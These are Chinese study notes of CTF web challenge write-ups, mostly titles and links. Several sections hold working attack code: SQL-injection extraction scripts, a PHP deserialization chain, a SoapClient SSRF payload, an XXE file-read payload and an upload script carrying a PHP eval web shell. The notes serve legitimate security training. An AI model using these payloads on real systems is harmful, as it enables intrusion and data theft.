[HFCTF2020]JustEscape
WP
vm2沙盒逃逸
涉及到nodejs不会
[网鼎杯2018]Unfinish
脚本
import requests
from bs4 import BeautifulSoup
import time
# Challenge instance; `m` accumulates the characters recovered so far.
url = 'http://f8933a3b-5f22-4bde-bde9-7a49c4b1f0a4.node4.buuoj.cn:81/'
m = ''

for pos in range(100):
    # One fresh account per position: the probe is stored as the username,
    # and the index page renders it back as a number (the ascii() value of
    # the probed character), which is read out of the page's <span>.
    probe = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(pos + 1)
    mailbox = f'abc{pos}@qq.com'
    sess = requests.session()
    sess.post(url + 'register.php', data={'email': mailbox, 'username': probe, 'password': '123456'})
    sess.post(url + 'login.php', data={'email': mailbox, 'password': '123456'})
    page = sess.post(url + 'index.php')
    shown = BeautifulSoup(page.text, 'html.parser').span.string.strip()
    code = int(shown)
    # The loop treats a rendered 0 as "past the end of the value".
    if code == 0:
        break
    m += chr(code)
    print(m)
    time.sleep(1)
[MRCTF2020]Ezaudit
考点是mt_rand的种子,伪随机,和之前的一个伪随机题目做法一模一样
总结:
先计算种子:
# Alphabet the challenge's key generator indexes with mt_rand(), in order.
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
# The observed public key.
str2 = 'KVQP0LdJKRaV3n9D'
str3 = str1[::-1]
length = len(str2)

# php_mt_seed input: one "value value min max" group per observed character,
# where value is the character's index into str1 and min/max are the
# mt_rand() bounds the generator used (0 .. len(str1)-1).
upper_bound = len(str1) - 1
groups = []
for ch in str2:
    idx = str1.find(ch)
    if idx < 0:
        # Characters outside the alphabet contribute nothing (as before).
        continue
    groups.append(f'{idx} {idx} 0 {upper_bound} ')
res = ''.join(groups)
print(res)
配合php_mt_seed来将种子爆破出来
再计算私钥:
<?php
// Seed recovered (via php_mt_seed) from the observed public key. With a
// fixed seed mt_rand() replays the same sequence, which is why the
// private key generated after the public key is computable at all.
mt_srand(1775196155);
// Builds a key of $length characters, each chosen from the alphabet by
// mt_rand(). With a seeded generator the result is fully determined.
function public_key($length = 16) {
    $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $last = strlen($alphabet) - 1;
    $key = '';
    while (strlen($key) < $length) {
        $key .= $alphabet[mt_rand(0, $last)];
    }
    return $key;
}
// Same alphabet and the same mt_rand() call as public_key(): both keys
// are drawn from one generator, so once the seed is known the private key
// is just the next $length draws after the public key.
function private_key($length = 12) {
    $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $picked = array();
    for ($n = 0; $n < $length; $n++) {
        $picked[] = substr($alphabet, mt_rand(0, strlen($alphabet) - 1), 1);
    }
    return implode('', $picked);
}
// Print both keys. The labels are the challenge's own (mojibake'd) strings
// and are output unchanged.
echo "ÕâÊǹ«Ô¿:", public_key(), "</br>";
echo "ÕâÊÇ˽Կ:", private_key(), "</br>";
?>
[强网杯 2019]Upload
一条链子,简单看了一下网上的wp感觉少点
首先:
找到这个文件上传检测,或者与这个文件上传有关的点也就是Profile这个子类,以及还会认为这是反序列化的题目是在这里:
跟踪这个函数:
// Authenticates from the `user` cookie alone: the cookie value is
// base64-decoded and handed to unserialize(), so whoever controls the
// cookie decides which class is instantiated and with what properties.
// That is the entry point the rest of the write-up builds on.
// Returns 1 when the DB row agrees with the cookie object, 0 otherwise;
// returns nothing when the cookie is absent.
public function login_check(){
$profile=cookie('user');
if(!empty($profile)){
// Untrusted data reaching unserialize() with no allowed_classes limit.
$this->profile=unserialize(base64_decode($profile));
$this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
// array_diff() is empty when every DB value also appears in the cookie
// object; `==null` is a loose comparison, so an empty array passes it.
if(array_diff($this->profile_db,$this->profile)==null){
return 1;
}else{
return 0;
}
}
}
同时在此php文件中可以利用construct来给其赋值为0直接不经过此if的判断
他会把你cookie中的user的值先base64解码然后反序列化,其中导致出现漏洞的代码是
// Fragment of the upload handler (its signature and opening lines are not
// quoted). $ext, $filename_tmp and $filename are object properties, so an
// object that arrives through unserialize() brings its own source and
// destination paths with it instead of having them derived from the
// upload request.
if($this->ext) {
// getimagesize() inspects the image file's headers only; it says nothing
// about the destination name the copy below will use.
if(getimagesize($this->filename_tmp)) {
@copy($this->filename_tmp, $this->filename);
@unlink($this->filename_tmp);
$this->img="../upload/$this->upload_menu/$this->filename";
$this->update_img();
}else{
$this->error('Forbidden type!', url('../index'));
}
}else{
$this->error('Unknow file type!', url('../index'));
}
}
这是他的文件上传的特色,是将文件重命名,导致后期我们可以将jpg文件改为php文件
那么下面就是如何调用这个upload_img这个函数了,在本页的末尾有两个魔术方法:
// Property read for an undeclared name: resolved through the `except`
// array, so the contents of `except` decide what e.g. $this->index yields.
public function __get($name)
{
return $this->except[$name];
}
// Call of an undeclared method: the method name is looked up as a
// property (which for undeclared names goes through __get above) and the
// value found is invoked as a method on $this. Together with __get this
// means the `except` array can redirect any unknown method call to any
// method of the class — the reason magic methods on unserializable classes
// need careful review.
public function __call($name, $arguments)
{
if($this->{$name}){
$this->{$this->{$name}}($arguments);
}
}
有这两个方法的存在那么调用本页的函数就不成问题,再继续寻找能触发该页面的call方法的方法,需要在同一个命名空间里面,所以很快就找到了:
// Runs when the object is destroyed. `registed` and `checker` are plain
// properties, so for an object produced by unserialize() both are whatever
// the serialized data said: an empty `registed` makes this call index() on
// an attacker-chosen `checker` object.
public function __destruct()
{
if(!$this->registed){
$this->checker->index();
}
}
exp:
<?php
namespace app\web\controller;
use think\Controller;
// Stand-in for the application's Profile used only to produce the
// serialized string: serialize() emits the public properties, and the
// application's own methods run on the result after unserialize().
// Property names and order are kept as-is; changing them changes the
// serialized output.
class Profile{
public $checker = 0;
// Source path: the image uploaded earlier (challenge-specific path).
public $filename_tmp = '../public/upload/fb7714fd023d486ddc9939267763bc21/a4a2c22c85451e94294fac2ec87c48c2.png';
// Destination path the upload handler copies to.
public $filename = '../public/upload/fb7714fd023d486ddc9939267763bc21/yn8rt.php';
// Non-zero so the `if($this->ext)` branch of the handler is taken.
public $ext = 1;
// Makes an unknown index() call resolve to upload_img() via __get/__call.
public $except = array('index' => 'upload_img');
}
// Outer object of the chain: the application's Register::__destruct calls
// $this->checker->index() when `registed` is empty, so `checker` is set to
// a Profile and `registed` is left unset.
class Register{
public $checker;
public $registed;
public function __construct()
{
$this->checker=new Profile();
}
}
// Serialize the object graph and base64-encode it, matching what
// login_check() expects in the `user` cookie (base64 → unserialize).
$cookie = base64_encode(serialize(new Register()));
echo $cookie;
?>
[GYCTF2020]Easyphp
https://johnfrod.top/ctf/gyctf2020easyphp/
[GXYCTF2019]StrongestMind
from requests import *
import re
import time
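# How the challenge page prints a problem: "<int> <op> <int>". The regex is
# the original author's; the "." on each side of the operator presumably
# stands for a space (not verified against the page).
_PROBLEM = re.compile(r'\d+.[+-].\d+')
_TERMS = re.compile(r'(\d+)\s*([+-])\s*(\d+)')
_INDEX = "http://f7ec9408-bbeb-4a20-9e38-e4d90de04744.node4.buuoj.cn:81/index.php"


def _solve(expr):
    """Return the integer value of an "a + b" / "a - b" expression.

    `expr` is text lifted from an HTTP response, i.e. untrusted input.
    The original passed it to eval(), which lets the server run arbitrary
    Python on the client; instead the two integers and the operator are
    parsed explicitly and everything else raises ValueError.
    """
    found = _TERMS.fullmatch(expr.strip())
    if found is None:
        raise ValueError(f"not a two-term arithmetic problem: {expr!r}")
    left, op, right = found.groups()
    return int(left) + int(right) if op == '+' else int(left) - int(right)


def _answer(sess, page_text):
    """Solve the first problem on `page_text` and submit the answer.

    Returns the response to the submission. Raises IndexError when the page
    shows no problem and ValueError when the problem cannot be parsed.
    """
    expr = _PROBLEM.findall(page_text)[0]
    value = _solve(expr)
    print(value)
    return sess.post(_INDEX, data={"answer": value})


s = session()
a = s.get("http://f7ec9408-bbeb-4a20-9e38-e4d90de04744.node4.buuoj.cn:81/")
a = _answer(s, a.text)
for i in range(1005):
    try:
        a = _answer(s, a.text)
        time.sleep(0.5)
        print(i)
    except Exception as exc:
        # Best-effort as before (keep polling), but say why a round failed
        # instead of swallowing it silently.
        print(f"round {i}: skipped ({exc})")
print(a.text)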
[SCTF2019]Flag Shop
https://www.freesion.com/article/9299639089/
[SUCTF 2018]GetShell
利用取反写木马来实现绕过
WP
bestphp’s revenge
利用soapclient来实现ssrf
<?php
// Produces the serialized SoapClient the write-up feeds to the session /
// unserialize() path. SoapClient is a built-in class whose `location` and
// `user_agent` options become part of the HTTP request it later sends, so
// letting it be created from user-controlled serialized data turns the
// server into a request proxy (SSRF). Defence: do not unserialize user
// data, or restrict it with allowed_classes.
$target = "http://127.0.0.1/flag.php";
// The "\r\n" inside user_agent is presumably what ends the User-Agent
// header line and lets the Cookie line follow as its own header (CRLF
// injection) — confirm against the request actually emitted.
$attack = new SoapClient(null,array('location' => $target,
'user_agent' => "yn8rt\r\nCookie: PHPSESSID=l6ne21akbgdv48jff5h53go5i6\r\n",
'uri' => "123"));
$payload = urlencode(serialize($attack));
echo $payload;
?>
?name=|O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A3%3A%22123%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A53%3A%22yn8rt%0D%0ACookie%3A+PHPSESSID%3Dl6ne21akbgdv48jff5h53go5i6%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D&f=session_start
serialize_handler=php_serialize
?f=extract
b=call_user_func
[b01lers2020]Life on Mars
没看明白
[安洵杯 2019]不是文件上传
strrchr() 函数:查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符。
WP
[ISITDTU 2019]EasyPHP
WP
利用异或再异或绕过字符数限制
[GYCTF2020]Ez_Express
学习JavaScript这一篇就够了
JS原型链污染初探
具体参考p师傅的文章 初探JavaScript原型链污染
WP1
原型链污染
[RoarCTF 2019]Online Proxy
x-forwarded-for注入
二次注入
盲注
WP
[CSAWQual 2019]Web_Unagi
xxe的绕过
<?xml version='1.0'?>
<!-- XXE probe as submitted to the challenge: the internal DTD subset
     declares an external entity backed by file:///flag and <intro>
     references it. A parser that resolves external entities substitutes
     the file's contents into that field. The defence on the server side is
     to disable DTD processing / external entity resolution for
     user-supplied XML. -->
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>bob@fakesite.com</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
[HarekazeCTF2019]Avatar Uploader 1
WP
[GKCTF 2021]easycms
任意文件下载漏洞
WP
[BSidesCF 2019]SVGMagic
xxe漏洞
WP
[EIS 2019]EzPOP
WP
[N1CTF 2018]eating_cms
WP
[SWPU2019]Web4
WP
[FireshellCTF2020]Caas
WP
[极客大挑战 2020]Roamphp1-Welcome
WP
[GXYCTF2019]BabysqliV3.0
<?php
// Silences every warning/notice for the whole script; together with the
// @-suppressed calls below nothing about failed mkdir/copy/read is logged.
error_reporting(0);
// Challenge source, quoted as-is. The class assembles PHP source text in
// $this->cmd and eval()s it from __destruct(), so the three writers of
// $cmd (constructor, upload(), __destruct()) and the checks in front of
// them are the whole security story of this file.
class Uploader{
public $Filename;
public $cmd;
public $token;
// Chooses the target path. Without `name` in the query string the file
// lands in a per-user sandbox: <cwd>/uploads/<md5(user)>/<user>.txt.
function __construct(){
$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
$ext = ".txt";
@mkdir($sandbox, 0777, true);
// Denylist with literal spaces: the pattern has no `x` modifier, so the
// alternatives " filter:\/\/ " etc. only match when surrounded by spaces.
// A denylist written like this does not block what it names; an allowlist
// of permitted names would be the robust check.
if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
$this->Filename = $_GET['name'];
}
else{
$this->Filename = $sandbox.$_SESSION['user'].$ext;
}
$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
$this->token = $_SESSION['user'];
}
// Builds the move_uploaded_file() statement, or a die() on rejection.
// $sandbox/$ext are declared global but were only ever constructor locals,
// so they are unset here.
function upload($file){
global $sandbox;
global $ext;
// The square brackets serve as the regex delimiters, so PCRE sees the
// pattern `^a-z0-9` (the literal text "a-z0-9" at the start), not a
// character class: this does not validate the filename's characters.
if(preg_match("[^a-z0-9]", $this->Filename)){
$this->cmd = "die('illegal filename!');";
}
else{
if($file['size'] > 1024){
$this->cmd = "die('you are too big (a€2a¨C?`?€?)');";
}
else{
// $file['tmp_name'] and $this->Filename are spliced into PHP source
// text that eval() will run; neither is escaped.
$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
}
}
}
// String conversion yields the target path; file_get_contents($uploader)
// in the caller depends on this.
function __toString(){
global $sandbox;
global $ext;
return $this->Filename;
}
// eval() sink: whatever $cmd holds when the object is destroyed is run.
// The only guard is that token equals the current session user.
function __destruct(){
if($this->token != $_SESSION['user']){
$this->cmd = "die('check token falied!');";
}
eval($this->cmd);
}
}
// Request entry point: build the Uploader (target path decided in its
// constructor), let upload() set $cmd, then read the file back through the
// object's __toString(). The eval() in __destruct() runs when $uploader is
// destroyed, at the latest at script end.
if(isset($_FILES['file'])) {
$uploader = new Uploader();
$uploader->upload($_FILES["file"]);
// file_get_contents() on the object resolves to the target path; read
// errors are silenced with @.
if(@file_get_contents($uploader)){
echo "???¨¦?¡é??¡¥?? ????? ????¨C???????<br>".$uploader."<br>";
echo file_get_contents($uploader);
}
}
?>
[Black Watch 入群题]Web
异或脚本
import requests
flag = ''
# Boolean probes for the successive enumeration steps; only payload4 is
# used by the loop below, the others are kept as the earlier stages.
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1'
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1'
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1'
payload4 = '1^(ascii(substr((select(group_concat(username))from(admin)),{},1))>{})^1'

BASE = 'http://1f8818ec-5797-4bee-b46f-9ec71dac112a.node4.buuoj.cn:81/backend/content_detail.php?id='

for pos in range(1, 100):
    # Binary search over codes 28..137 for the character at `pos`; the
    # presence of the marker text in the JSON reply is what the original
    # treats as "character code is greater than the guess".
    lo, hi = 28, 137
    guess = (lo + hi) // 2
    while lo < hi:
        reply = requests.get(BASE + payload4.format(pos, guess))
        body = str(reply.json())
        if "Ôýʦ¸µÈ±¸öÅ®ÅóÓÑ" in body:
            lo = guess + 1
        else:
            hi = guess
        guess = (lo + hi) // 2
    # Kept from the original: chr() never yields '', so this never breaks.
    if not chr(guess):
        break
    flag += chr(guess)
    print(flag)
print(flag)
[SUCTF 2018]MultiSQL
WP
十进制绕过过滤写马
[RoarCTF 2019]Simple Upload
import requests
'''·½·¨¶þ'''
# Challenge upload endpoint. A Session is created as in the original but,
# also as in the original, the request itself goes through requests.post.
url = "http://f98099c2-262f-472c-8002-393f7a2b62fd.node4.buuoj.cn:81/index.php/home/index/upload/"
s = requests.Session()
upload_name = "shell.<>php"
upload_body = "<?php eval($_GET['cmd'])?>"
files = {"file": (upload_name, upload_body)}
r = requests.post(url, files=files)
print(r.text)
[CISCN2019 华东南赛区]Web4
wp
flask-session-manager使用
[SUCTF 2018]annonymous
wp
import requests
# Try func_name=%00lambda_<n> for n in 0..99 and stop at the first reply
# that mentions "flag"; every other reply just prints a progress line.
for idx in range(100):
    url = "http://4b101e75-e297-4884-98f3-52bd2aa1e4d9.node4.buuoj.cn:81/?func_name=%00lambda_{}".format(idx)
    res = requests.get(url)
    if "flag" not in res.text:
        print('loading....')
        continue
    print(res.text)
    break
[GoogleCTF2019 Quals]Bnv
WP
|